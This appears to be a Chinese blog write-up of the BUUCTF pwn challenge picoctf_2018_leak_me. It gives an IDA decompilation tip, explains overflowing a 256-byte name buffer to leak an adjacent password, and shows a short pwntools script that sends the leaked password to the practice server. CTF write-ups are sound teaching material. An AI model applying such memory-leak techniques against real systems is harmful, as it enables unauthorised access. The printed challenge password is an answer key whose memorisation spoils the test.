[BUUCTF-pwn]——picoctf_2018_leak_me

题目没什么难度，但是可能反汇编的时候你们可能会出现一些问题。

peak小知识

pwn题，有时会碰到无法反汇编的情况，大多数情况下，都是call的位置报错，双击函数，按F5人为给它反汇编，再返回就可以了。不过有时候，是IDA栈指针的问题，大多数还是前者居多。

思路

在IDA中，v6代表name s是password.距离0x100也就是256。

输入256个字符后，我们可以直接将password泄露出来。这样我们就可以在下面调用flag函数了。

写个小dome leek出来password再说。

exploit

from pwn import *
p = remote("node3.buuoj.cn",27223)
p.sendline('a')
p.recv()
p.sendline('a_reAllY_s3cuRe_p4s$word_f85406')p.interactive()

[BUUCTF-pwn]——picoctf_2018_leak_me（内涵peak小知识）相关推荐

[Jarvis OJ - PWN]——Typo(内涵peak小知识)
[Jarvis OJ - PWN]--Typo 题目地址: https://www.jarvisoj.com/challenges 题目: 还是先check一下, 是arm架构.还是第一次遇到. pe ...
[攻防世界 pwn]——pwn1（内涵peak小知识）
[攻防世界 pwn]--pwn1 题目地址:https://adworld.xctf.org.cn/ 题目: peak小知识这道题目的关键就是泄露canary,通常我们泄露canary有两种方法,遇 ...
[攻防世界 pwn]——time_formatter（内涵peak小知识）
[攻防世界 pwn]--time_formatter 题目地址: https://adworld.xctf.org.cn/ 题目: 这是一道堆利用的题, UAFF(use After Free)漏洞. ...
[攻防世界 pwn]——string（内涵peak小知识）
[攻防世界 pwn]--string 题目地址:https://adworld.xctf.org.cn/ 题目: peak小知识 mmap函数作用,mmap主要是将文件映射到一段内存去同时设置那段内存 ...
[BUUCTF-pwn]——[极客大挑战 2019]Not Bad(ORW)(内涵peak小知识)
[BUUCTF-pwn]--[极客大挑战 2019]Not Bad 又是一道收获满满的题目. peak小知识 seccomp: seccomp是一种内核中的安全机制,正常情况下,程序可以使用所有的sy ...
[BUUCTF-pwn]——mrctf2020_shellcode_revenge(可见字符shellcode)(内涵peak小知识)
[BUUCTF-pwn]--mrctf2020_shellcode_revenge(可见字符shellcode) 检查了下保护发现NX 没有开,肯定要自己写shellcode呀. 不过这道题,刷新了我 ...
[BUUCTF-pwn]——ciscn_2019_es_2(内涵peak小知识)
[BUUCTF-pwn]--ciscn_2019_es_2 题目地址: https://buuoj.cn/challenges#ciscn_2019_es_2 这是一道栈劫持的题,第一次写这种题的题解 ...
BUUCTF PWN rip1 WP
BUUCTF PWN rip 1 这是一个WP,也是一个自己练习过程的记录. 先把文件放入pwn机中检查一下,发现并没有开启保护,所以应该是一道简单题我们运行一下试试,它让你输入一段字符然后 ...
【C#小知识】C#中一些易混淆概念总结（三）---------结构，GC，静态成员，静态类...
目录: [C#小知识]C#中一些易混淆概念总结 [C#小知识]C#中一些易混淆概念总结(二) ---------------------------------------分割线----------- ...

[BUUCTF-pwn]——picoctf_2018_leak_me（内涵peak小知识）

[BUUCTF-pwn]——picoctf_2018_leak_me

peak小知识

思路

exploit

[BUUCTF-pwn]——picoctf_2018_leak_me（内涵peak小知识）相关推荐

最新文章

热门文章